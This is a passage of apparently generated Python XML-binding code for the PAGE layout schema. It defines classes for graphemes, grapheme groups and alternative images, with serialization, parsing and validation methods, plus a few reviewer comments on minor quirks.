    def export(self, outfile, level, namespaceprefix_='', namespacedef_='xmlns:pc="http://schema.primaresearch.org/PAGE/gts/pagecontent/2019-07-15"', name_='AlternativeImageType', pretty_print=True):
        """Serialise this element as XML to *outfile*."""
        imported_ns_def_ = GenerateDSNamespaceDefs_.get('AlternativeImageType')
        if imported_ns_def_ is not None:
            namespacedef_ = imported_ns_def_
        if pretty_print:
            eol_ = '\n'
        else:
            eol_ = ''
        if self.original_tagname_ is not None and name_ == 'AlternativeImageType':
            name_ = self.original_tagname_
        if UseCapturedNS_ and self.ns_prefix_:
            namespaceprefix_ = self.ns_prefix_ + ':'
        showIndent(outfile, level, pretty_print)
        outfile.write('<%s%s%s' % (namespaceprefix_, name_, namespacedef_ and ' ' + namespacedef_ or '', ))
        already_processed = set()
        self.exportAttributes(outfile, level, already_processed, namespaceprefix_, name_='AlternativeImageType')
        if self.hasContent_():
            outfile.write('>%s' % (eol_, ))
            self.exportChildren(outfile, level + 1, namespaceprefix_, namespacedef_, name_='AlternativeImageType', pretty_print=pretty_print)
            outfile.write('</%s%s>%s' % (namespaceprefix_, name_, eol_))
        else:
            # Attributes only: emit a self-closing tag.
            outfile.write('/>%s' % (eol_, ))
    def exportAttributes(self, outfile, level, already_processed, namespaceprefix_='', name_='AlternativeImageType'):
        """Write the filename/comments/conf XML attributes to *outfile*."""
        if self.filename is not None and 'filename' not in already_processed:
            already_processed.add('filename')
            outfile.write(' filename=%s' % (self.gds_encode(self.gds_format_string(quote_attrib(self.filename), input_name='filename')), ))
        if self.comments is not None and 'comments' not in already_processed:
            already_processed.add('comments')
            outfile.write(' comments=%s' % (self.gds_encode(self.gds_format_string(quote_attrib(self.comments), input_name='comments')), ))
        if self.conf is not None and 'conf' not in already_processed:
            already_processed.add('conf')
            outfile.write(' conf="%s"' % self.gds_format_float(self.conf, input_name='conf'))
    def exportChildren(self, outfile, level, namespaceprefix_='', namespacedef_='xmlns:pc="http://schema.primaresearch.org/PAGE/gts/pagecontent/2019-07-15"', name_='AlternativeImageType', fromsubclass_=False, pretty_print=True):
        # No child elements to export.
        pass
    def build(self, node, gds_collector_=None):
        """Populate this object from an XML *node*; return self."""
        self.gds_collector_ = gds_collector_
        if SaveElementTreeNode:
            self.gds_elementtree_node_ = node
        already_processed = set()
        self.ns_prefix_ = node.prefix
        self.buildAttributes(node, node.attrib, already_processed)
        for child in node:
            nodeName_ = Tag_pattern_.match(child.tag).groups()[-1]
            self.buildChildren(child, node, nodeName_, gds_collector_=gds_collector_)
        return self
    def buildAttributes(self, node, attrs, already_processed):
        """Read filename/comments/conf from *node*'s attributes."""
        value = find_attr_value_('filename', node)
        if value is not None and 'filename' not in already_processed:
            already_processed.add('filename')
            self.filename = value
        value = find_attr_value_('comments', node)
        if value is not None and 'comments' not in already_processed:
            already_processed.add('comments')
            self.comments = value
        value = find_attr_value_('conf', node)
        if value is not None and 'conf' not in already_processed:
            already_processed.add('conf')
            value = self.gds_parse_float(value, node, 'conf')
            self.conf = value
            self.validate_ConfSimpleType(self.conf)    # validate type ConfSimpleType
    def buildChildren(self, child_, node, nodeName_, fromsubclass_=False, gds_collector_=None):
        # AlternativeImage has no child elements; nothing to do.
        pass
# end class AlternativeImageType
class GraphemesType(GeneratedsSuper):
    """Container for graphemes, grapheme groups and
    non-printing characters.

    Generated XML binding: holds three repeatable child collections
    (``Grapheme``, ``NonPrintingChar``, ``GraphemeGroup``) and provides
    ``export`` (serialization) / ``build`` (parsing) round-trip support.
    """
    __hash__ = GeneratedsSuper.__hash__
    # Schema member specification consumed by the generated framework;
    # each entry describes one repeatable (list-valued) child element.
    member_data_items_ = [
        MemberSpec_('Grapheme', 'GraphemeType', 1, 0, {'name': 'Grapheme', 'type': 'GraphemeType'}, 8),
        MemberSpec_('NonPrintingChar', 'NonPrintingCharType', 1, 0, {'name': 'NonPrintingChar', 'type': 'NonPrintingCharType'}, 8),
        MemberSpec_('GraphemeGroup', 'GraphemeGroupType', 1, 0, {'name': 'GraphemeGroup', 'type': 'GraphemeGroupType'}, 8),
    ]
    subclass = None
    superclass = None
    def __init__(self, Grapheme=None, NonPrintingChar=None, GraphemeGroup=None, gds_collector_=None, **kwargs_):
        # gds_collector_ accumulates validation messages during parsing.
        self.gds_collector_ = gds_collector_
        self.gds_elementtree_node_ = None
        self.original_tagname_ = None
        self.parent_object_ = kwargs_.get('parent_object_')
        self.ns_prefix_ = "pc"
        # Each list-valued child defaults to a fresh list per instance
        # (avoids the shared-mutable-default pitfall).
        if Grapheme is None:
            self.Grapheme = []
        else:
            self.Grapheme = Grapheme
        self.Grapheme_nsprefix_ = "pc"
        if NonPrintingChar is None:
            self.NonPrintingChar = []
        else:
            self.NonPrintingChar = NonPrintingChar
        self.NonPrintingChar_nsprefix_ = "pc"
        if GraphemeGroup is None:
            self.GraphemeGroup = []
        else:
            self.GraphemeGroup = GraphemeGroup
        self.GraphemeGroup_nsprefix_ = "pc"
    def factory(*args_, **kwargs_):
        # Instantiate a registered override subclass when one is active,
        # otherwise fall back to this generated class.
        if CurrentSubclassModule_ is not None:
            subclass = getSubclassFromModule_(
                CurrentSubclassModule_, GraphemesType)
            if subclass is not None:
                return subclass(*args_, **kwargs_)
        if GraphemesType.subclass:
            return GraphemesType.subclass(*args_, **kwargs_)
        else:
            return GraphemesType(*args_, **kwargs_)
    factory = staticmethod(factory)
    def get_ns_prefix_(self):
        return self.ns_prefix_
    def set_ns_prefix_(self, ns_prefix):
        self.ns_prefix_ = ns_prefix
    # Generated accessor/mutator trio for each list-valued child.
    def get_Grapheme(self):
        return self.Grapheme
    def set_Grapheme(self, Grapheme):
        self.Grapheme = Grapheme
    def add_Grapheme(self, value):
        self.Grapheme.append(value)
    def insert_Grapheme_at(self, index, value):
        self.Grapheme.insert(index, value)
    def replace_Grapheme_at(self, index, value):
        self.Grapheme[index] = value
    def get_NonPrintingChar(self):
        return self.NonPrintingChar
    def set_NonPrintingChar(self, NonPrintingChar):
        self.NonPrintingChar = NonPrintingChar
    def add_NonPrintingChar(self, value):
        self.NonPrintingChar.append(value)
    def insert_NonPrintingChar_at(self, index, value):
        self.NonPrintingChar.insert(index, value)
    def replace_NonPrintingChar_at(self, index, value):
        self.NonPrintingChar[index] = value
    def get_GraphemeGroup(self):
        return self.GraphemeGroup
    def set_GraphemeGroup(self, GraphemeGroup):
        self.GraphemeGroup = GraphemeGroup
    def add_GraphemeGroup(self, value):
        self.GraphemeGroup.append(value)
    def insert_GraphemeGroup_at(self, index, value):
        self.GraphemeGroup.insert(index, value)
    def replace_GraphemeGroup_at(self, index, value):
        self.GraphemeGroup[index] = value
    def hasContent_(self):
        # True when any child element is present; controls whether export
        # writes an open/close tag pair or a self-closing tag.
        if (
            self.Grapheme or
            self.NonPrintingChar or
            self.GraphemeGroup
        ):
            return True
        else:
            return False
    def export(self, outfile, level, namespaceprefix_='', namespacedef_='xmlns:pc="http://schema.primaresearch.org/PAGE/gts/pagecontent/2019-07-15"', name_='GraphemesType', pretty_print=True):
        # Serialize this element to ``outfile``: opening tag + attributes,
        # then children, then closing tag. ``pretty_print`` toggles newlines.
        imported_ns_def_ = GenerateDSNamespaceDefs_.get('GraphemesType')
        if imported_ns_def_ is not None:
            namespacedef_ = imported_ns_def_
        if pretty_print:
            eol_ = '\n'
        else:
            eol_ = ''
        if self.original_tagname_ is not None and name_ == 'GraphemesType':
            name_ = self.original_tagname_
        if UseCapturedNS_ and self.ns_prefix_:
            namespaceprefix_ = self.ns_prefix_ + ':'
        showIndent(outfile, level, pretty_print)
        outfile.write('<%s%s%s' % (namespaceprefix_, name_, namespacedef_ and ' ' + namespacedef_ or '', ))
        already_processed = set()
        self.exportAttributes(outfile, level, already_processed, namespaceprefix_, name_='GraphemesType')
        if self.hasContent_():
            outfile.write('>%s' % (eol_, ))
            self.exportChildren(outfile, level + 1, namespaceprefix_, namespacedef_, name_='GraphemesType', pretty_print=pretty_print)
            showIndent(outfile, level, pretty_print)
            outfile.write('</%s%s>%s' % (namespaceprefix_, name_, eol_))
        else:
            outfile.write('/>%s' % (eol_, ))
    def exportAttributes(self, outfile, level, already_processed, namespaceprefix_='', name_='GraphemesType'):
        # This type carries no XML attributes.
        pass
    def exportChildren(self, outfile, level, namespaceprefix_='', namespacedef_='xmlns:pc="http://schema.primaresearch.org/PAGE/gts/pagecontent/2019-07-15"', name_='GraphemesType', fromsubclass_=False, pretty_print=True):
        # Emit all child elements in schema order.
        if pretty_print:
            eol_ = '\n'
        else:
            eol_ = ''
        for Grapheme_ in self.Grapheme:
            namespaceprefix_ = self.Grapheme_nsprefix_ + ':' if (UseCapturedNS_ and self.Grapheme_nsprefix_) else ''
            Grapheme_.export(outfile, level, namespaceprefix_, namespacedef_='', name_='Grapheme', pretty_print=pretty_print)
        for NonPrintingChar_ in self.NonPrintingChar:
            namespaceprefix_ = self.NonPrintingChar_nsprefix_ + ':' if (UseCapturedNS_ and self.NonPrintingChar_nsprefix_) else ''
            NonPrintingChar_.export(outfile, level, namespaceprefix_, namespacedef_='', name_='NonPrintingChar', pretty_print=pretty_print)
        for GraphemeGroup_ in self.GraphemeGroup:
            namespaceprefix_ = self.GraphemeGroup_nsprefix_ + ':' if (UseCapturedNS_ and self.GraphemeGroup_nsprefix_) else ''
            GraphemeGroup_.export(outfile, level, namespaceprefix_, namespacedef_='', name_='GraphemeGroup', pretty_print=pretty_print)
    def build(self, node, gds_collector_=None):
        # Populate this instance from an ElementTree node: attributes first,
        # then recurse into child elements. Returns self for chaining.
        self.gds_collector_ = gds_collector_
        if SaveElementTreeNode:
            self.gds_elementtree_node_ = node
        already_processed = set()
        self.ns_prefix_ = node.prefix
        self.buildAttributes(node, node.attrib, already_processed)
        for child in node:
            nodeName_ = Tag_pattern_.match(child.tag).groups()[-1]
            self.buildChildren(child, node, nodeName_, gds_collector_=gds_collector_)
        return self
    def buildAttributes(self, node, attrs, already_processed):
        # No attributes to parse for this type.
        pass
    def buildChildren(self, child_, node, nodeName_, fromsubclass_=False, gds_collector_=None):
        # Dispatch on the child's local tag name and append the built object
        # to the matching list.
        if nodeName_ == 'Grapheme':
            obj_ = GraphemeType.factory(parent_object_=self)
            obj_.build(child_, gds_collector_=gds_collector_)
            self.Grapheme.append(obj_)
            obj_.original_tagname_ = 'Grapheme'
        elif nodeName_ == 'NonPrintingChar':
            obj_ = NonPrintingCharType.factory(parent_object_=self)
            obj_.build(child_, gds_collector_=gds_collector_)
            self.NonPrintingChar.append(obj_)
            obj_.original_tagname_ = 'NonPrintingChar'
        elif nodeName_ == 'GraphemeGroup':
            obj_ = GraphemeGroupType.factory(parent_object_=self)
            obj_.build(child_, gds_collector_=gds_collector_)
            self.GraphemeGroup.append(obj_)
            obj_.original_tagname_ = 'GraphemeGroup'
# end class GraphemesType
class GraphemeBaseType(GeneratedsSuper):
    """Base type for graphemes, grapheme groups and non-printing characters.

    XML attributes:
      - id (required string)
      - index (required non-negative int; order within the parent container)
      - ligature (optional boolean)
      - charType (optional; one of 'base' or 'combining')
      - custom, comments (optional strings for generic use)
    Child elements: zero or more TextEquiv.
    Supports xsi:type extension via ``extensiontype_``.
    """
    __hash__ = GeneratedsSuper.__hash__
    # Schema member specification consumed by the generated framework.
    member_data_items_ = [
        MemberSpec_('id', 'string', 0, 0, {'use': 'required'}),
        MemberSpec_('index', 'indexType2', 0, 0, {'use': 'required'}),
        MemberSpec_('ligature', 'boolean', 0, 1, {'use': 'optional'}),
        MemberSpec_('charType', 'charTypeType', 0, 1, {'use': 'optional'}),
        MemberSpec_('custom', 'string', 0, 1, {'use': 'optional'}),
        MemberSpec_('comments', 'string', 0, 1, {'use': 'optional'}),
        MemberSpec_('TextEquiv', 'TextEquivType', 1, 1, {'maxOccurs': 'unbounded', 'minOccurs': '0', 'name': 'TextEquiv', 'type': 'TextEquivType'}, None),
    ]
    subclass = None
    superclass = None
    def __init__(self, id=None, index=None, ligature=None, charType=None, custom=None, comments=None, TextEquiv=None, extensiontype_=None, gds_collector_=None, **kwargs_):
        self.gds_collector_ = gds_collector_
        self.gds_elementtree_node_ = None
        self.original_tagname_ = None
        self.parent_object_ = kwargs_.get('parent_object_')
        self.ns_prefix_ = "pc"
        # _cast coerces attribute values to the declared simple type.
        self.id = _cast(None, id)
        self.id_nsprefix_ = None
        self.index = _cast(int, index)
        self.index_nsprefix_ = None
        self.ligature = _cast(bool, ligature)
        self.ligature_nsprefix_ = None
        self.charType = _cast(None, charType)
        self.charType_nsprefix_ = None
        self.custom = _cast(None, custom)
        self.custom_nsprefix_ = None
        self.comments = _cast(None, comments)
        self.comments_nsprefix_ = None
        if TextEquiv is None:
            self.TextEquiv = []
        else:
            self.TextEquiv = TextEquiv
        self.TextEquiv_nsprefix_ = "pc"
        self.extensiontype_ = extensiontype_
    def factory(*args_, **kwargs_):
        # Instantiate a registered override subclass when one is active,
        # otherwise fall back to this generated class.
        if CurrentSubclassModule_ is not None:
            subclass = getSubclassFromModule_(
                CurrentSubclassModule_, GraphemeBaseType)
            if subclass is not None:
                return subclass(*args_, **kwargs_)
        if GraphemeBaseType.subclass:
            return GraphemeBaseType.subclass(*args_, **kwargs_)
        else:
            return GraphemeBaseType(*args_, **kwargs_)
    factory = staticmethod(factory)
    def get_ns_prefix_(self):
        return self.ns_prefix_
    def set_ns_prefix_(self, ns_prefix):
        self.ns_prefix_ = ns_prefix
    def get_TextEquiv(self):
        return self.TextEquiv
    def set_TextEquiv(self, TextEquiv):
        self.TextEquiv = TextEquiv
    def add_TextEquiv(self, value):
        self.TextEquiv.append(value)
    def insert_TextEquiv_at(self, index, value):
        self.TextEquiv.insert(index, value)
    def replace_TextEquiv_at(self, index, value):
        self.TextEquiv[index] = value
    def get_id(self):
        return self.id
    def set_id(self, id):
        self.id = id
    def get_index(self):
        return self.index
    def set_index(self, index):
        self.index = index
    def get_ligature(self):
        return self.ligature
    def set_ligature(self, ligature):
        self.ligature = ligature
    def get_charType(self):
        return self.charType
    def set_charType(self, charType):
        self.charType = charType
    def get_custom(self):
        return self.custom
    def set_custom(self, custom):
        self.custom = custom
    def get_comments(self):
        return self.comments
    def set_comments(self, comments):
        self.comments = comments
    def get_extensiontype_(self): return self.extensiontype_
    def set_extensiontype_(self, extensiontype_): self.extensiontype_ = extensiontype_
    def validate_indexType2(self, value):
        # Validate type indexType2, a restriction on int.
        # Records messages into gds_collector_ (validation is skipped when
        # no collector is attached).
        # NOTE(review): the trailing `result = False` is dead — the method
        # only returns explicitly on a type mismatch; callers ignore the
        # return value, so behavior is unaffected. Generated-code quirk.
        if value is not None and Validate_simpletypes_ and self.gds_collector_ is not None:
            if not isinstance(value, int):
                lineno = self.gds_get_node_lineno_()
                self.gds_collector_.add_message('Value "%(value)s"%(lineno)s is not of the correct base simple type (int)' % {"value": value, "lineno": lineno, })
                return False
            if value < 0:
                lineno = self.gds_get_node_lineno_()
                self.gds_collector_.add_message('Value "%(value)s"%(lineno)s does not match xsd minInclusive restriction on indexType2' % {"value": value, "lineno": lineno} )
                result = False
    def validate_charTypeType(self, value):
        # Validate type charTypeType, a restriction on string.
        # Allowed values are 'base' and 'combining'; other values are
        # reported to gds_collector_ but not rejected.
        # NOTE(review): same dead `result = False` quirk as above.
        if value is not None and Validate_simpletypes_ and self.gds_collector_ is not None:
            if not isinstance(value, str):
                lineno = self.gds_get_node_lineno_()
                self.gds_collector_.add_message('Value "%(value)s"%(lineno)s is not of the correct base simple type (str)' % {"value": value, "lineno": lineno, })
                return False
            value = value
            enumerations = ['base', 'combining']
            if value not in enumerations:
                lineno = self.gds_get_node_lineno_()
                self.gds_collector_.add_message('Value "%(value)s"%(lineno)s does not match xsd enumeration restriction on charTypeType' % {"value" : encode_str_2_3(value), "lineno": lineno} )
                result = False
    def hasContent_(self):
        # True when any TextEquiv child is present; controls whether export
        # writes an open/close tag pair or a self-closing tag.
        if (
            self.TextEquiv
        ):
            return True
        else:
            return False
    def export(self, outfile, level, namespaceprefix_='', namespacedef_='xmlns:pc="http://schema.primaresearch.org/PAGE/gts/pagecontent/2019-07-15"', name_='GraphemeBaseType', pretty_print=True):
        # Serialize this element to ``outfile``: opening tag + attributes,
        # then children, then closing tag. ``pretty_print`` toggles newlines.
        imported_ns_def_ = GenerateDSNamespaceDefs_.get('GraphemeBaseType')
        if imported_ns_def_ is not None:
            namespacedef_ = imported_ns_def_
        if pretty_print:
            eol_ = '\n'
        else:
            eol_ = ''
        if self.original_tagname_ is not None and name_ == 'GraphemeBaseType':
            name_ = self.original_tagname_
        if UseCapturedNS_ and self.ns_prefix_:
            namespaceprefix_ = self.ns_prefix_ + ':'
        showIndent(outfile, level, pretty_print)
        outfile.write('<%s%s%s' % (namespaceprefix_, name_, namespacedef_ and ' ' + namespacedef_ or '', ))
        already_processed = set()
        self.exportAttributes(outfile, level, already_processed, namespaceprefix_, name_='GraphemeBaseType')
        if self.hasContent_():
            outfile.write('>%s' % (eol_, ))
            self.exportChildren(outfile, level + 1, namespaceprefix_, namespacedef_, name_='GraphemeBaseType', pretty_print=pretty_print)
            showIndent(outfile, level, pretty_print)
            outfile.write('</%s%s>%s' % (namespaceprefix_, name_, eol_))
        else:
            outfile.write('/>%s' % (eol_, ))
    def exportAttributes(self, outfile, level, already_processed, namespaceprefix_='', name_='GraphemeBaseType'):
        # Write each attribute that is set and not already emitted;
        # xsi:type is written last when this instance was extended.
        if self.id is not None and 'id' not in already_processed:
            already_processed.add('id')
            outfile.write(' id=%s' % (self.gds_encode(self.gds_format_string(quote_attrib(self.id), input_name='id')), ))
        if self.index is not None and 'index' not in already_processed:
            already_processed.add('index')
            outfile.write(' index="%s"' % self.gds_format_integer(self.index, input_name='index'))
        if self.ligature is not None and 'ligature' not in already_processed:
            already_processed.add('ligature')
            outfile.write(' ligature="%s"' % self.gds_format_boolean(self.ligature, input_name='ligature'))
        if self.charType is not None and 'charType' not in already_processed:
            already_processed.add('charType')
            outfile.write(' charType=%s' % (self.gds_encode(self.gds_format_string(quote_attrib(self.charType), input_name='charType')), ))
        if self.custom is not None and 'custom' not in already_processed:
            already_processed.add('custom')
            outfile.write(' custom=%s' % (self.gds_encode(self.gds_format_string(quote_attrib(self.custom), input_name='custom')), ))
        if self.comments is not None and 'comments' not in already_processed:
            already_processed.add('comments')
            outfile.write(' comments=%s' % (self.gds_encode(self.gds_format_string(quote_attrib(self.comments), input_name='comments')), ))
        if self.extensiontype_ is not None and 'xsi:type' not in already_processed:
            already_processed.add('xsi:type')
            outfile.write(' xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"')
            if ":" not in self.extensiontype_:
                imported_ns_type_prefix_ = GenerateDSNamespaceTypePrefixes_.get(self.extensiontype_, '')
                outfile.write(' xsi:type="%s%s"' % (imported_ns_type_prefix_, self.extensiontype_))
            else:
                outfile.write(' xsi:type="%s"' % self.extensiontype_)
    def exportChildren(self, outfile, level, namespaceprefix_='', namespacedef_='xmlns:pc="http://schema.primaresearch.org/PAGE/gts/pagecontent/2019-07-15"', name_='GraphemeBaseType', fromsubclass_=False, pretty_print=True):
        # Emit all TextEquiv children.
        if pretty_print:
            eol_ = '\n'
        else:
            eol_ = ''
        for TextEquiv_ in self.TextEquiv:
            namespaceprefix_ = self.TextEquiv_nsprefix_ + ':' if (UseCapturedNS_ and self.TextEquiv_nsprefix_) else ''
            TextEquiv_.export(outfile, level, namespaceprefix_, namespacedef_='', name_='TextEquiv', pretty_print=pretty_print)
    def build(self, node, gds_collector_=None):
        # Populate this instance from an ElementTree node: attributes first,
        # then recurse into child elements. Returns self for chaining.
        self.gds_collector_ = gds_collector_
        if SaveElementTreeNode:
            self.gds_elementtree_node_ = node
        already_processed = set()
        self.ns_prefix_ = node.prefix
        self.buildAttributes(node, node.attrib, already_processed)
        for child in node:
            nodeName_ = Tag_pattern_.match(child.tag).groups()[-1]
            self.buildChildren(child, node, nodeName_, gds_collector_=gds_collector_)
        return self
    def buildAttributes(self, node, attrs, already_processed):
        # Parse each recognized attribute once, validating typed values.
        value = find_attr_value_('id', node)
        if value is not None and 'id' not in already_processed:
            already_processed.add('id')
            self.id = value
        value = find_attr_value_('index', node)
        if value is not None and 'index' not in already_processed:
            already_processed.add('index')
            self.index = self.gds_parse_integer(value, node, 'index')
            self.validate_indexType2(self.index)    # validate type indexType2
        value = find_attr_value_('ligature', node)
        if value is not None and 'ligature' not in already_processed:
            already_processed.add('ligature')
            # Accept only canonical XSD boolean lexical forms.
            if value in ('true', '1'):
                self.ligature = True
            elif value in ('false', '0'):
                self.ligature = False
            else:
                raise_parse_error(node, 'Bad boolean attribute')
        value = find_attr_value_('charType', node)
        if value is not None and 'charType' not in already_processed:
            already_processed.add('charType')
            self.charType = value
            self.validate_charTypeType(self.charType)    # validate type charTypeType
        value = find_attr_value_('custom', node)
        if value is not None and 'custom' not in already_processed:
            already_processed.add('custom')
            self.custom = value
        value = find_attr_value_('comments', node)
        if value is not None and 'comments' not in already_processed:
            already_processed.add('comments')
            self.comments = value
        value = find_attr_value_('xsi:type', node)
        if value is not None and 'xsi:type' not in already_processed:
            already_processed.add('xsi:type')
            self.extensiontype_ = value
    def buildChildren(self, child_, node, nodeName_, fromsubclass_=False, gds_collector_=None):
        # Dispatch on the child's local tag name.
        if nodeName_ == 'TextEquiv':
            obj_ = TextEquivType.factory(parent_object_=self)
            obj_.build(child_, gds_collector_=gds_collector_)
            self.TextEquiv.append(obj_)
            obj_.original_tagname_ = 'TextEquiv'
# end class GraphemeBaseType
class GraphemeType(GraphemeBaseType):
    """Represents a sub-element of a glyph.
    Smallest graphical unit that can be
    assigned a Unicode code point.

    Extends GraphemeBaseType with a single Coords child element and two
    convenience helpers (``get_polygon``, ``get_polygon_string``) for
    reading the Coords points string.
    """
    __hash__ = GeneratedsSuper.__hash__
    # Schema member specification for the additional Coords child.
    member_data_items_ = [
        MemberSpec_('Coords', 'CoordsType', 0, 0, {'name': 'Coords', 'type': 'CoordsType'}, None),
    ]
    subclass = None
    superclass = GraphemeBaseType
    def __init__(self, id=None, index=None, ligature=None, charType=None, custom=None, comments=None, TextEquiv=None, Coords=None, gds_collector_=None, **kwargs_):
        self.gds_collector_ = gds_collector_
        self.gds_elementtree_node_ = None
        self.original_tagname_ = None
        self.parent_object_ = kwargs_.get('parent_object_')
        self.ns_prefix_ = "pc"
        # Delegate the shared attributes/TextEquiv handling to the base class.
        super(globals().get("GraphemeType"), self).__init__(id, index, ligature, charType, custom, comments, TextEquiv,  **kwargs_)
        self.Coords = Coords
        self.Coords_nsprefix_ = "pc"
    def factory(*args_, **kwargs_):
        # Instantiate a registered override subclass when one is active,
        # otherwise fall back to this generated class.
        if CurrentSubclassModule_ is not None:
            subclass = getSubclassFromModule_(
                CurrentSubclassModule_, GraphemeType)
            if subclass is not None:
                return subclass(*args_, **kwargs_)
        if GraphemeType.subclass:
            return GraphemeType.subclass(*args_, **kwargs_)
        else:
            return GraphemeType(*args_, **kwargs_)
    factory = staticmethod(factory)
    def get_ns_prefix_(self):
        return self.ns_prefix_
    def set_ns_prefix_(self, ns_prefix):
        self.ns_prefix_ = ns_prefix
    def get_Coords(self):
        return self.Coords
    def set_Coords(self, Coords):
        self.Coords = Coords
    def hasContent_(self):
        # Content exists when Coords is set or the base class has content.
        if (
            self.Coords is not None or
            super(GraphemeType, self).hasContent_()
        ):
            return True
        else:
            return False
    def export(self, outfile, level, namespaceprefix_='', namespacedef_='xmlns:pc="http://schema.primaresearch.org/PAGE/gts/pagecontent/2019-07-15"', name_='GraphemeType', pretty_print=True):
        # Serialize this element to ``outfile``: opening tag + attributes,
        # then children, then closing tag. ``pretty_print`` toggles newlines.
        imported_ns_def_ = GenerateDSNamespaceDefs_.get('GraphemeType')
        if imported_ns_def_ is not None:
            namespacedef_ = imported_ns_def_
        if pretty_print:
            eol_ = '\n'
        else:
            eol_ = ''
        if self.original_tagname_ is not None and name_ == 'GraphemeType':
            name_ = self.original_tagname_
        if UseCapturedNS_ and self.ns_prefix_:
            namespaceprefix_ = self.ns_prefix_ + ':'
        showIndent(outfile, level, pretty_print)
        outfile.write('<%s%s%s' % (namespaceprefix_, name_, namespacedef_ and ' ' + namespacedef_ or '', ))
        already_processed = set()
        self.exportAttributes(outfile, level, already_processed, namespaceprefix_, name_='GraphemeType')
        if self.hasContent_():
            outfile.write('>%s' % (eol_, ))
            self.exportChildren(outfile, level + 1, namespaceprefix_, namespacedef_, name_='GraphemeType', pretty_print=pretty_print)
            showIndent(outfile, level, pretty_print)
            outfile.write('</%s%s>%s' % (namespaceprefix_, name_, eol_))
        else:
            outfile.write('/>%s' % (eol_, ))
    def exportAttributes(self, outfile, level, already_processed, namespaceprefix_='', name_='GraphemeType'):
        # All attributes come from the base type.
        super(GraphemeType, self).exportAttributes(outfile, level, already_processed, namespaceprefix_, name_='GraphemeType')
    def exportChildren(self, outfile, level, namespaceprefix_='', namespacedef_='xmlns:pc="http://schema.primaresearch.org/PAGE/gts/pagecontent/2019-07-15"', name_='GraphemeType', fromsubclass_=False, pretty_print=True):
        # Base-class children (TextEquiv) first, then Coords.
        super(GraphemeType, self).exportChildren(outfile, level, namespaceprefix_, namespacedef_, name_, True, pretty_print=pretty_print)
        if pretty_print:
            eol_ = '\n'
        else:
            eol_ = ''
        if self.Coords is not None:
            namespaceprefix_ = self.Coords_nsprefix_ + ':' if (UseCapturedNS_ and self.Coords_nsprefix_) else ''
            self.Coords.export(outfile, level, namespaceprefix_, namespacedef_='', name_='Coords', pretty_print=pretty_print)
    def build(self, node, gds_collector_=None):
        # Populate this instance from an ElementTree node: attributes first,
        # then recurse into child elements. Returns self for chaining.
        self.gds_collector_ = gds_collector_
        if SaveElementTreeNode:
            self.gds_elementtree_node_ = node
        already_processed = set()
        self.ns_prefix_ = node.prefix
        self.buildAttributes(node, node.attrib, already_processed)
        for child in node:
            nodeName_ = Tag_pattern_.match(child.tag).groups()[-1]
            self.buildChildren(child, node, nodeName_, gds_collector_=gds_collector_)
        return self
    def buildAttributes(self, node, attrs, already_processed):
        super(GraphemeType, self).buildAttributes(node, attrs, already_processed)
    def buildChildren(self, child_, node, nodeName_, fromsubclass_=False, gds_collector_=None):
        if nodeName_ == 'Coords':
            obj_ = CoordsType.factory(parent_object_=self)
            obj_.build(child_, gds_collector_=gds_collector_)
            self.Coords = obj_
            obj_.original_tagname_ = 'Coords'
        # NOTE(review): gds_collector_ is not forwarded here, so validation
        # messages from base-class children (TextEquiv) are dropped during
        # parsing of this subtype — confirm whether intentional.
        super(GraphemeType, self).buildChildren(child_, node, nodeName_, True)
    def get_polygon(self):
        '''
        Get polygon from element which is parent of a Coords element.

        Parses ``self.Coords.points`` ("x1,y1 x2,y2 ...") into a list of
        [x, y] integer pairs. Raises AttributeError when Coords is unset
        and ValueError on non-integer coordinates.
        '''
        points = [point for point in self.Coords.points.split(' ')]
        return [[int(coord) for coord in point.split(',')] for point in points]
    def get_polygon_string(self):
        '''
        Get polygon string from element which is parent of a Coords element.

        Replaces the spaces separating point pairs with commas, producing a
        flat "x1,y1,x2,y2,..." string from ``self.Coords.points``.
        '''
        return self.Coords.points.replace(' ', ',')
# end class GraphemeType
class NonPrintingCharType(GraphemeBaseType):
    """A glyph component without visual representation
    but with Unicode code point.
    Non-visual / non-printing / control character.
    Part of grapheme container (of glyph) or grapheme sub group.

    Adds no members of its own; all behavior is inherited from
    GraphemeBaseType (attributes + TextEquiv children).
    """
    __hash__ = GeneratedsSuper.__hash__
    # No additional schema members beyond the base type.
    member_data_items_ = [
    ]
    subclass = None
    superclass = GraphemeBaseType
    def __init__(self, id=None, index=None, ligature=None, charType=None, custom=None, comments=None, TextEquiv=None, gds_collector_=None, **kwargs_):
        self.gds_collector_ = gds_collector_
        self.gds_elementtree_node_ = None
        self.original_tagname_ = None
        self.parent_object_ = kwargs_.get('parent_object_')
        self.ns_prefix_ = "pc"
        # Delegate everything to the base class.
        super(globals().get("NonPrintingCharType"), self).__init__(id, index, ligature, charType, custom, comments, TextEquiv,  **kwargs_)
    def factory(*args_, **kwargs_):
        # Instantiate a registered override subclass when one is active,
        # otherwise fall back to this generated class.
        if CurrentSubclassModule_ is not None:
            subclass = getSubclassFromModule_(
                CurrentSubclassModule_, NonPrintingCharType)
            if subclass is not None:
                return subclass(*args_, **kwargs_)
        if NonPrintingCharType.subclass:
            return NonPrintingCharType.subclass(*args_, **kwargs_)
        else:
            return NonPrintingCharType(*args_, **kwargs_)
    factory = staticmethod(factory)
    def get_ns_prefix_(self):
        return self.ns_prefix_
    def set_ns_prefix_(self, ns_prefix):
        self.ns_prefix_ = ns_prefix
    def hasContent_(self):
        # Content is determined entirely by the base class (TextEquiv).
        if (
            super(NonPrintingCharType, self).hasContent_()
        ):
            return True
        else:
            return False
    def export(self, outfile, level, namespaceprefix_='', namespacedef_='xmlns:pc="http://schema.primaresearch.org/PAGE/gts/pagecontent/2019-07-15"', name_='NonPrintingCharType', pretty_print=True):
        # Serialize this element to ``outfile``: opening tag + attributes,
        # then children, then closing tag. ``pretty_print`` toggles newlines.
        imported_ns_def_ = GenerateDSNamespaceDefs_.get('NonPrintingCharType')
        if imported_ns_def_ is not None:
            namespacedef_ = imported_ns_def_
        if pretty_print:
            eol_ = '\n'
        else:
            eol_ = ''
        if self.original_tagname_ is not None and name_ == 'NonPrintingCharType':
            name_ = self.original_tagname_
        if UseCapturedNS_ and self.ns_prefix_:
            namespaceprefix_ = self.ns_prefix_ + ':'
        showIndent(outfile, level, pretty_print)
        outfile.write('<%s%s%s' % (namespaceprefix_, name_, namespacedef_ and ' ' + namespacedef_ or '', ))
        already_processed = set()
        self.exportAttributes(outfile, level, already_processed, namespaceprefix_, name_='NonPrintingCharType')
        if self.hasContent_():
